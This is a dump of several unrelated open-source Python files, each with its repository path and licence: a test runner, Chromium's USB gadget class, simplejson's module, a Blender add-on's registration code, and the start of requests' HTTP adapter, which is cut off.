(dirs, files) = self.module.PreprocessFiles(dirs, files)
# Add the test lists to our available tests
for name in dirs + files:
self.addTest(name)
# If this modules defines a CoverageModule, add the coverage
# start and end functions.
if hasattr(self.module, 'CoverageModule'):
ignored = None
if hasattr(self.module,'CoverageIgnored'):
ignored = self.module.CoverageIgnored
ct = TestCoverage.TestCoverage(self.module.CoverageModule,ignored)
self.tests.insert(0, TestFunction.TestFunction(ct._start))
self.tests.append(TestFunction.TestFunction(ct._end))
return self.tests
def showTests(self, indent):
if self.isPackage:
# A package
print '%s%s%s' % (indent, self.name, os.sep)
new_indent = indent + ' '*2
for test in self.getTests():
test.showTests(new_indent)
else:
# A simple module
print '%s%s' % (indent, self.name)
return
def run(self, tester):
# Determine the modes
tester.startGroup(self.name)
modes = []
for mode in self.modes:
if mode.initialize(tester):
modes.append(mode)
if not modes:
tester.warning("All modes have been skipped")
for mode in modes:
mode.start(tester)
try:
have_run = 0
for test in self.getTests():
self.runTest(tester, test)
have_run = 1
if not have_run:
tester.warning('Module does define any tests')
finally:
mode.finish(tester)
tester.groupDone()
return
def runTest(self, tester, testObject):
# Saved to check for misbehaving tests
depth = len(tester.groups)
# Run the test
try:
testObject.run(tester)
except (KeyboardInterrupt, SystemExit):
raise
except:
tester.exception('Unhandled exception in test')
# Clean up for the interrupted test
if tester.test:
tester.testDone()
while len(tester.groups) > depth:
tester.groupDone()
return
if tester.test:
tester.warning('Failed to finish test (fixed)')
tester.testDone()
# Verify proper group count
count = len(tester.groups) - depth
if count < 0:
tester.error('Closed too many groups')
elif count > 0:
tester.warning('Failed to close %d groups (fixed)' % count)
while count:
count -= 1
tester.message('Closing group %s' % tester.groups[-1])
tester.groupDone()
return
| gpl-2.0 |
hefen1/chromium | tools/usb_gadget/gadget.py | 54 | 14586 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generic USB gadget functionality.
"""
import struct
import usb_constants
class Gadget(object):
"""Basic functionality for a USB device.
Implements standard control requests assuming that a subclass will handle
class- or vendor-specific requests.
"""
def __init__(self, device_desc, fs_config_desc, hs_config_desc):
"""Create a USB gadget device.
Args:
device_desc: USB device descriptor.
fs_config_desc: Low/full-speed device descriptor.
hs_config_desc: High-speed device descriptor.
"""
self._speed = usb_constants.Speed.UNKNOWN
self._chip = None
self._device_desc = device_desc
self._fs_config_desc = fs_config_desc
self._hs_config_desc = hs_config_desc
# dict mapping language codes to a dict mapping indexes to strings
self._strings = {}
# dict mapping interface numbers to a set of endpoint addresses
self._active_endpoints = {}
def GetDeviceDescriptor(self):
return self._device_desc
def GetFullSpeedConfigurationDescriptor(self):
return self._fs_config_desc
def GetHighSpeedConfigurationDescriptor(self):
return self._hs_config_desc
def GetConfigurationDescriptor(self):
if self._speed == usb_constants.Speed.FULL:
return self._fs_config_desc
elif self._speed == usb_constants.Speed.HIGH:
return self._hs_config_desc
else:
raise RuntimeError('Device is not connected.')
def GetSpeed(self):
return self._speed
def AddStringDescriptor(self, index, value, lang=0x0409):
"""Add a string descriptor to this device.
Args:
index: String descriptor index (matches 'i' fields in descriptors).
value: The string.
lang: Language code (default: English).
Raises:
ValueError: The index or language code is invalid.
"""
if index < 1 or index > 255:
raise ValueError('String descriptor index out of range.')
if lang < 0 or lang > 0xffff:
raise ValueError('String descriptor language code out of range.')
lang_strings = self._strings.setdefault(lang, {})
lang_strings[index] = value
def Connected(self, chip, speed):
"""The device has been connected to a USB host.
Args:
chip: USB controller.
speed: Connection speed.
"""
self._speed = speed
self._chip = chip
def Disconnected(self):
"""The device has been disconnected from the USB host."""
self._speed = usb_constants.Speed.UNKNOWN
self._chip = None
self._active_endpoints.clear()
def IsConnected(self):
return self._chip is not None
def ControlRead(self, request_type, request, value, index, length):
"""Handle a read on the control pipe (endpoint zero).
Args:
request_type: bmRequestType field of the setup packet.
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
length: Maximum amount of data the host expects the device to return.
Returns:
A buffer to return to the USB host with len <= length on success or
None to stall the pipe.
"""
assert request_type & usb_constants.Dir.IN
typ = request_type & usb_constants.Type.MASK
recipient = request_type & usb_constants.Recipient.MASK
if typ == usb_constants.Type.STANDARD:
return self.StandardControlRead(
recipient, request, value, index, length)
elif typ == usb_constants.Type.CLASS:
return self.ClassControlRead(
recipient, request, value, index, length)
elif typ == usb_constants.Type.VENDOR:
return self.VendorControlRead(
recipient, request, value, index, length)
def ControlWrite(self, request_type, request, value, index, data):
"""Handle a write to the control pipe (endpoint zero).
Args:
request_type: bmRequestType field of the setup packet.
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
data: Data stage of the request.
Returns:
True on success, None to stall the pipe.
"""
assert not request_type & usb_constants.Dir.IN
typ = request_type & usb_constants.Type.MASK
recipient = request_type & usb_constants.Recipient.MASK
if typ == usb_constants.Type.STANDARD:
return self.StandardControlWrite(
recipient, request, value, index, data)
elif typ == usb_constants.Type.CLASS:
return self.ClassControlWrite(
recipient, request, value, index, data)
elif typ == usb_constants.Type.VENDOR:
return self.VendorControlWrite(
recipient, request, value, index, data)
def SendPacket(self, endpoint, data):
"""Send a data packet on the given endpoint.
Args:
endpoint: Endpoint address.
data: Data buffer.
Raises:
ValueError: If the endpoint address is not valid.
RuntimeError: If the device is not connected.
"""
if self._chip is None:
raise RuntimeError('Device is not connected.')
if not endpoint & usb_constants.Dir.IN:
raise ValueError('Cannot write to non-input endpoint.')
self._chip.SendPacket(endpoint, data)
def ReceivePacket(self, endpoint, data):
"""Handle an incoming data packet on one of the device's active endpoints.
This method should be overridden by a subclass implementing endpoint-based
data transfers.
Args:
endpoint: Endpoint address.
data: Data buffer.
"""
pass
def HaltEndpoint(self, endpoint):
"""Signals a STALL condition to the host on the given endpoint.
Args:
endpoint: Endpoint address.
"""
self._chip.HaltEndpoint(endpoint)
def StandardControlRead(self, recipient, request, value, index, length):
"""Handle standard control transfers.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
length: Maximum amount of data the host expects the device to return.
Returns:
A buffer to return to the USB host with len <= length on success or
None to stall the pipe.
"""
if request == usb_constants.Request.GET_DESCRIPTOR:
desc_type = value >> 8
desc_index = value & 0xff
desc_lang = index
print 'GetDescriptor(recipient={}, type={}, index={}, lang={})'.format(
recipient, desc_type, desc_index, desc_lang)
return self.GetDescriptor(recipient, desc_type, desc_index, desc_lang,
length)
def GetDescriptor(self, recipient, typ, index, lang, length):
"""Handle a standard GET_DESCRIPTOR request.
See Universal Serial Bus Specification Revision 2.0 section 9.4.3.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
typ: Descriptor type.
index: Descriptor index.
lang: Descriptor language code.
length: Maximum amount of data the host expects the device to return.
Returns:
The value of the descriptor or None to stall the pipe.
"""
if recipient == usb_constants.Recipient.DEVICE:
if typ == usb_constants.DescriptorType.STRING:
return self.GetStringDescriptor(index, lang, length)
def ClassControlRead(self, recipient, request, value, index, length):
"""Handle class-specific control transfers.
This function should be overridden by a subclass implementing a particular
device class.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
length: Maximum amount of data the host expects the device to return.
Returns:
A buffer to return to the USB host with len <= length on success or
None to stall the pipe.
"""
_ = recipient, request, value, index, length
return None
def VendorControlRead(self, recipient, request, value, index, length):
"""Handle vendor-specific control transfers.
This function should be overridden by a subclass if implementing a device
that responds to vendor-specific requests.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
length: Maximum amount of data the host expects the device to return.
Returns:
A buffer to return to the USB host with len <= length on success or
None to stall the pipe.
"""
_ = recipient, request, value, index, length
return None
def StandardControlWrite(self, recipient, request, value, index, data):
"""Handle standard control transfers.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
data: Data stage of the request.
Returns:
True on success, None to stall the pipe.
"""
_ = data
if request == usb_constants.Request.SET_CONFIGURATION:
if recipient == usb_constants.Recipient.DEVICE:
return self.SetConfiguration(value)
elif request == usb_constants.Request.SET_INTERFACE:
if recipient == usb_constants.Recipient.INTERFACE:
return self.SetInterface(index, value)
def ClassControlWrite(self, recipient, request, value, index, data):
"""Handle class-specific control transfers.
This function should be overridden by a subclass implementing a particular
device class.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
data: Data stage of the request.
Returns:
True on success, None to stall the pipe.
"""
_ = recipient, request, value, index, data
return None
def VendorControlWrite(self, recipient, request, value, index, data):
"""Handle vendor-specific control transfers.
This function should be overridden by a subclass if implementing a device
that responds to vendor-specific requests.
Args:
recipient: Request recipient (device, interface, endpoint, etc.)
request: bRequest field of the setup packet.
value: wValue field of the setup packet.
index: wIndex field of the setup packet.
data: Data stage of the request.
Returns:
True on success, None to stall the pipe.
"""
_ = recipient, request, value, index, data
return None
def GetStringDescriptor(self, index, lang, length):
"""Handle a GET_DESCRIPTOR(String) request from the host.
Descriptor index 0 returns the set of languages supported by the device.
All other indices return the string descriptors registered with those
indices.
See Universal Serial Bus Specification Revision 2.0 section 9.6.7.
Args:
index: Descriptor index.
lang: Descriptor language code.
length: Maximum amount of data the host expects the device to return.
Returns:
The string descriptor or None to stall the pipe if the descriptor is not
found.
"""
if index == 0:
length = 2 + len(self._strings) * 2
header = struct.pack('<BB', length, usb_constants.DescriptorType.STRING)
lang_codes = [struct.pack('<H', lang)
for lang in self._strings.iterkeys()]
buf = header + ''.join(lang_codes)
assert len(buf) == length
return buf[:length]
elif lang not in self._strings:
return None
elif index not in self._strings[lang]:
return None
else:
string = self._strings[lang][index].encode('UTF-16LE')
header = struct.pack(
'<BB', 2 + len(string), usb_constants.DescriptorType.STRING)
buf = header + string
return buf[:length]
def SetConfiguration(self, index):
"""Handle a SET_CONFIGURATION request from the host.
See Universal Serial Bus Specification Revision 2.0 section 9.4.7.
Args:
index: Configuration index selected.
Returns:
True on success, None on error to stall the pipe.
"""
print 'SetConfiguration({})'.format(index)
for endpoint_addrs in self._active_endpoints.values():
for endpoint_addr in endpoint_addrs:
self._chip.StopEndpoint(endpoint_addr)
endpoint_addrs.clear()
if index == 0:
# SET_CONFIGRATION(0) puts the device into the Address state which
# Windows does before suspending the port.
return True
elif index != 1:
return None
config_desc = self.GetConfigurationDescriptor()
for interface_desc in config_desc.GetInterfaces():
if interface_desc.bAlternateSetting != 0:
continue
endpoint_addrs = self._active_endpoints.setdefault(
interface_desc.bInterfaceNumber, set())
for endpoint_desc in interface_desc.GetEndpoints():
self._chip.StartEndpoint(endpoint_desc)
endpoint_addrs.add(endpoint_desc.bEndpointAddress)
return True
def SetInterface(self, interface, alt_setting):
"""Handle a SET_INTERFACE request from the host.
See Universal Serial Bus Specification Revision 2.0 section 9.4.10.
Args:
interface: Interface number to configure.
alt_setting: Alternate setting to select.
Returns:
True on success, None on error to stall the pipe.
"""
print 'SetInterface({}, {})'.format(interface, alt_setting)
config_desc = self.GetConfigurationDescriptor()
interface_desc = None
for interface_option in config_desc.GetInterfaces():
if (interface_option.bInterfaceNumber == interface and
interface_option.bAlternateSetting == alt_setting):
interface_desc = interface_option
if interface_desc is None:
return None
endpoint_addrs = self._active_endpoints.setdefault(interface, set())
for endpoint_addr in endpoint_addrs:
self._chip.StopEndpoint(endpoint_addr)
for endpoint_desc in interface_desc.GetEndpoints():
self._chip.StartEndpoint(endpoint_desc)
endpoint_addrs.add(endpoint_desc.bEndpointAddress)
return True
| bsd-3-clause |
bcherry/adequatelygood | utils/external/simplejson/__init__.py | 55 | 13802 | r"""
A simple, fast, extensible JSON encoder and decoder
JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
simplejson exposes an API familiar to uses of the standard library
marshal and pickle modules.
Encoding basic Python object hierarchies::
>>> import simplejson
>>> simplejson.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print simplejson.dumps("\"foo\bar")
"\"foo\bar"
>>> print simplejson.dumps(u'\u1234')
"\u1234"
>>> print simplejson.dumps('\\')
"\\"
>>> print simplejson.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> simplejson.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson
>>> simplejson.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson
>>> print simplejson.dumps({'4': 5, '6': 7}, sort_keys=True, indent=4)
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson
>>> simplejson.loads('["foo", {"bar":["baz", null, 1.0, 2]}]')
[u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> simplejson.loads('"\\"foo\\bar"')
u'"foo\x08ar'
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> simplejson.load(io)
[u'streaming API']
Specializing JSON object decoding::
>>> import simplejson
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> simplejson.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> import decimal
>>> simplejson.loads('1.1', parse_float=decimal.Decimal)
Decimal("1.1")
Extending JSONEncoder::
>>> import simplejson
>>> class ComplexEncoder(simplejson.JSONEncoder):
... def default(self, obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... return simplejson.JSONEncoder.default(self, obj)
...
>>> dumps(2 + 1j, cls=ComplexEncoder)
'[2.0, 1.0]'
>>> ComplexEncoder().encode(2 + 1j)
'[2.0, 1.0]'
>>> list(ComplexEncoder().iterencode(2 + 1j))
['[', '2.0', ', ', '1.0', ']']
Using simplejson from the shell to validate and
pretty-print::
$ echo '{"json":"obj"}' | python -msimplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -msimplejson.tool
Expecting property name: line 1 column 2 (char 2)
Note that the JSON produced by this module's default settings
is a subset of YAML, so it may be used as a serializer for that as well.
"""
__version__ = '1.9.2'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONEncoder',
]
if __name__ == '__main__':
import warnings
warnings.warn('python -msimplejson is deprecated, use python -msiplejson.tool', DeprecationWarning)
from simplejson.decoder import JSONDecoder
from simplejson.encoder import JSONEncoder
else:
from decoder import JSONDecoder
from encoder import JSONEncoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, **kw):
"""
Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is ``True`` then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is ``False``, then the some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If ``check_circular`` is ``False``, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is ``False``, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and object
members will be pretty-printed with that indent level. An indent level
of 0 will only insert newlines. ``None`` is the most compact representation.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (skipkeys is False and ensure_ascii is True and
check_circular is True and allow_nan is True and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, **kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, **kw):
"""
Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is ``True`` then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is ``False``, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is ``False``, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is ``False``, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (skipkeys is False and ensure_ascii is True and
check_circular is True and allow_nan is True and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
**kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, **kw):
"""
Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
If the contents of ``fp`` is encoded with an ASCII based encoding other
than utf-8 (e.g. latin-1), then an appropriate ``encoding`` name must
be specified. Encodings that are not ASCII based (such as UCS-2) are
not allowed, and should be wrapped with
``codecs.getreader(fp)(encoding)``, or simply decoded to a ``unicode``
object and passed to ``loads()``
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, **kw):
"""
Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
If ``s`` is a ``str`` instance and is encoded with an ASCII based encoding
other than utf-8 (e.g. latin-1) then an appropriate ``encoding`` name
must be specified. Encodings that are not ASCII based (such as UCS-2)
are not allowed and should be decoded to ``unicode`` first.
``object_hook`` is an optional function that will be called with the
result of any object literal decode (a ``dict``). The return value of
``object_hook`` will be used instead of the ``dict``. This feature
can be used to implement custom decoders (e.g. JSON-RPC class hinting).
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN, null, true, false.
This can be used to raise an exception if invalid JSON numbers
are encountered.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
return cls(encoding=encoding, **kw).decode(s)
#
# Compatibility cruft from other libraries
#
def decode(s):
"""
demjson, python-cjson API compatibility hook. Use loads(s) instead.
"""
import warnings
warnings.warn("simplejson.loads(s) should be used instead of decode(s)",
DeprecationWarning)
return loads(s)
def encode(obj):
"""
demjson, python-cjson compatibility hook. Use dumps(s) instead.
"""
import warnings
warnings.warn("simplejson.dumps(s) should be used instead of encode(s)",
DeprecationWarning)
return dumps(obj)
def read(s):
"""
jsonlib, JsonUtils, python-json, json-py API compatibility hook.
Use loads(s) instead.
"""
import warnings
warnings.warn("simplejson.loads(s) should be used instead of read(s)",
DeprecationWarning)
return loads(s)
def write(obj):
"""
jsonlib, JsonUtils, python-json, json-py API compatibility hook.
Use dumps(s) instead.
"""
import warnings
warnings.warn("simplejson.dumps(s) should be used instead of write(s)",
DeprecationWarning)
return dumps(obj)
if __name__ == '__main__':
import simplejson.tool
simplejson.tool.main()
| mit |
Passtechsoft/TPEAlpGen | blender/release/scripts/addons_contrib/automat/__init__.py | 2 | 1958 | # Copyright 2015 Théo Friberg under GNU GPL 3
bl_info = {
"name": "Cycles Automatic Materials",
"author": "Théo Friberg",
"blender": (2, 70, 0),
"version": (0, 39),
"location": "Space > Automatic / Adjustable Material from Image",
"description": "One-click material setup from texture for Cycles. Blur from b°wide node pack.",
"warning": "Still a work in progress",
"wiki_url": "",
"tracker_url": "mailto:theo.friberg@gmail.com?subject="
"Bug report for Cycles Automatic Materials addon&body="
"I have come across the following error while using the Cycles automatic"
" materials addon (Please explain both the symptoms of the error and"
" what you were doing when the error occured. If you think a specific"
" action of yours is related to the error, please include a description"
" of it too.):",
"support": "COMMUNITY",
"category": "Render"}
if "bpy" in locals():
import importlib
importlib.reload(JSONOps)
importlib.reload(AutoOp)
importlib.reload(AdjOp)
else:
from . import JSONOps
from . import AutoOp
from . import AdjOp
import bpy
import json
import os
def menu_draw(self, context):
self.layout.operator("com.new_automat", text="Automatic Material from Image", icon="FILE_IMAGE")
def register():
"""This method registers the AutomatOperatorFromTexture
operator and the AdjustableOperatorFromTexture operator. """
bpy.utils.register_class(AutoOp.AutomatOperatorFromTexture)
bpy.utils.register_class(AdjOp.AdjustableOperatorFromTexture)
bpy.types.INFO_MT_file_import.append(menu_draw)
def unregister():
"""This method unregisters the AutomatOperatorFromTexture
operator and the AdjustableOperatorFromTexture operator. """
bpy.types.INFO_MT_file_import.remove(menu_draw)
bpy.utils.unregister_class(AutoOp.AutomatOperatorFromTexture)
bpy.utils.unregister_class(AdjOp.AdjustableOperatorFromTexture)
# Run register if the file is ran from blenders text editor
if __name__ == "__main__":
register()
| gpl-3.0 |
lucashmorais/x-Bench | mozmill-env/python/Lib/site-packages/requests/adapters.py | 58 | 12272 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, ProxyManager
from .packages.urllib3.response import HTTPResponse
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param max_retries: The maximum number of retries each connection should attempt.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter()
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
self.max_retries = max_retries
self.config = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK):
"""Initializes a urllib3 PoolManager. This method should not be called
from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block)
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <reqeusts.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(url).scheme)
if proxy:
proxy = prepend_scheme_if_needed(proxy, urlparse(url).scheme)
conn = ProxyManager(self.poolmanager.connection_from_url(proxy))
else:
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a proxy, the full URL has to be
used. Otherwise, we should only use the path portion of the URL.
This shoudl not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
